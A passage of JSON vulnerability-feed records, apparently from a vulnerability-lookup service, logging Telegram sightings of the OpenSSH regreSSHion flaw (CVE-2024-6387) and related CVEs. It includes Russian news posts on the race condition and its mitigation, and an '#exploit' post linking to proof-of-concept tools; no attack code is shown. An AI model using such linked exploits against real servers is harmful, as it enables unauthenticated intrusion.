"published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11654", "content": "#exploit\n1. CVE-2024-43405:\nNuclei Signature Verification Bypass\nhttps://www.wiz.io/blog/nuclei-signature-verification-bypass\n\n2. CVE-2024-6387:\nRegreSSHion Code Execution Vulnerability\nhttps://cybersecuritynews.com/regresshion-code-execution-vulnerability\n\n3. RustPotato\nhttps://github.com/safedv/RustPotato", "creation_timestamp": "2025-01-08T05:41:48.000000Z"}, {"uuid": "386bb6dd-62b4-43d8-938a-a3e224b77ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/R4-_y6ndHpMO5RcFL7oD2NdGZ19HDWIwZBenRUUcAuCPdAXgtA", "content": "", "creation_timestamp": "2024-07-19T22:03:18.000000Z"}, {"uuid": "a44d227b-99ea-4d63-a4a6-d8e192be43a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/PHXAbdj0kab8t-O_yCb6E0Svn8PSMqOnT-bu_HtJDW43RVcxbg", "content": "", "creation_timestamp": "2024-07-27T21:47:47.000000Z"}, {"uuid": "71b84639-76b7-4895-8477-4e89f944575a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/oz0Z9dlSR4ZZ6jNjM7roRrflMcVLetYvZ9Egj_ntKiqNCWuEBg", "content": "", "creation_timestamp": "2024-07-27T21:49:29.000000Z"}, {"uuid": "242a6896-8013-4765-b831-06b17397fa25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/3Oon2iyBBgSWSbue4XhPKNhZhUBag8MSlKjZCHXTNevmg3eUsg", "content": "", "creation_timestamp": "2024-07-27T21:49:32.000000Z"}, {"uuid": "f4bfb702-a220-4fe1-a3f5-ddee93e5203d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/S_E_Reborn/4898", "content": "\u041c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 OpenSSH \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0437-\u0437\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 regreSSHion.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-6387 \u0438 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u043c\u0438 Qualys, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0435\u0435 \u0443\u0436\u0435 \u043f\u0440\u0438\u0440\u0430\u0432\u043d\u044f\u043b\u0438 \u043f\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u043a Log4Shell\u00a02021 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 OpenSSH \u00absshd\u00bb \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e \u0433\u043e\u043d\u043a\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u043d\u0430 \u0431\u0430\u0437\u0435 glibc, \u043f\u043e Windows \u0438 macOS - \u043f\u043e\u043a\u0430 \u0435\u0449\u0435 \u043d\u0435\u044f\u0441\u043d\u043e.\n\n\u041a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f regreSSHion \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c RCE \u0441 \u043d\u0430\u0438\u0432\u044b\u0441\u0448\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u0440\u0430\u0436\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0434\u0430\u0436\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\nOpenSSH, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043a\u0430\u043d\u0430\u043b\u0430 \u043f\u043e \u0441\u0435\u0442\u0438 \u0432 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0435 \u043a\u043b\u0438\u0435\u043d\u0442-\u0441\u0435\u0440\u0432\u0435\u0440, \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Qualys, \u043f\u043e\u0438\u0441\u043a Shodan \u0438 Censys \u0432\u044b\u0434\u0430\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 14 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 OpenSSH, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430.\n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Qualys \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u043e\u043a\u043e\u043b\u043e 700 000 \u0441\u0438\u0441\u0442\u0435\u043c, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u043a \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0443, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e CVE-2024-6387 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0440\u0435\u0433\u0440\u0435\u0441\u0441 \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2006-5051 \u0438 \u0432\u043d\u043e\u0432\u044c \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 2020 \u0433\u043e\u0434\u0430 \u043a\u0430\u043a \u0447\u0430\u0441\u0442\u044c \u0432\u044b\u043f\u0443\u0441\u043a\u0430 OpenSSH 8.5p1. \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 8.5p1-9.7p1, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0434\u043e 4.4p1 (\u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u043d\u0435 \u0438\u043c\u0435\u044e\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f CVE-2006-5051 \u0438\u00a0CVE-2008-4109). \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c OpenBSD \u043d\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0438 \u0438\u043c\u0435\u044e\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\nQualys \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0430\u0441\u044c \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u044f\u043c\u0438 regreSSHion, \u043d\u043e \u043d\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0443\u0435\u0442 PoC \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 IoC \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a.", "creation_timestamp": "2024-07-01T18:38:51.000000Z"}, {"uuid": "ebd1def2-a27b-4e55-b97e-19cb1aff56f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/S_E_Reborn/5021", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430 FreeBSD \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 OpenSSH, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f RCE \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n\nCVE-2024-7589 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 7,4 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0432 sshd(8) \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u043b\u044f \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u041e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f, \u043a\u043e\u0433\u0434\u0430 \u043a\u043b\u0438\u0435\u043d\u0442 \u043d\u0435 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 LoginGraceTime \u0441\u0435\u043a\u0443\u043d\u0434 (\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e 120).\n\n\u041e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 sshd(8), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0435 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043b\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root.\n\nCVE-2024-7589 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043e\u0434\u0438\u043d \u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a\u00a0regreSSHion (CVE-2024-6387), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430.\n\n\u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432\u043e\u0437\u043d\u0438\u043a \u0438\u0437-\u0437\u0430 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 blacklistd \u0432 OpenSSH \u0432 FreeBSD, \u043a\u0430\u043a \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430.\n\n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0432\u044b\u0437\u043e\u0432\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u043c\u0438 \u0434\u043b\u044f \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0432 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 sshd(8), \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c FreeBSD \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c sshd, \u0447\u0442\u043e\u0431\u044b \u0441\u043d\u0438\u0437\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u0433\u0440\u043e\u0437\u044b.\n\n\u0412 \u0441\u043b\u0443\u0447\u0430\u044f\u0445, \u043a\u043e\u0433\u0434\u0430 sshd(8) \u043d\u0435 \u0443\u0434\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0448\u0435\u043d\u0430 \u043f\u0443\u0442\u0435\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 LoginGraceTime \u043d\u0430 0 \u0432 /etc/ssh/sshd_config \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0441\u043a\u0430 sshd(8), \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0435\u043c\u043e\u043d \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043a DoS, \u043d\u043e \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 RCE.", "creation_timestamp": "2024-08-13T10:50:33.000000Z"}, {"uuid": "640a03be-146f-4c20-9cf7-ec2ddaa8ed23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/S_E_Reborn/4929", "content": "\u041a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 regreSSHion (CVE-2024-6387) \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Red Hat Enterprise Linux (RHEL) 9 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Fedora.\n\nCVE-2024-6409 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0438\u0446\u0435\u0439, \u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435, \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c SSH.\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 RHEL 9, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 8.7.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Fedora Linux 36 \u0438 37, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 OpenSSH 8.7 \u0438 8.8.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u0439 SIGALRM, \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439. \u041e\u043d\u043e \u0437\u0434\u0435\u0441\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u044b\u0437\u043e\u0432\u043e\u043c cleanup_exit() \u0432 grace_alarm_handler() \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0425\u043e\u0442\u044f\u00a0cleanup_exit() \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u043c \u043a\u043e\u0434\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434\u043e\u0432\u043e\u0439 \u0431\u0430\u0437\u0435 OpenSSH, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043d\u043e\u0435 \u043a \u043f\u0430\u043a\u0435\u0442\u0430\u043c RHEL 9 \u0438 Fedora, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 cleanup_exit() \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0430\u0443\u0434\u0438\u0442\u0430, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 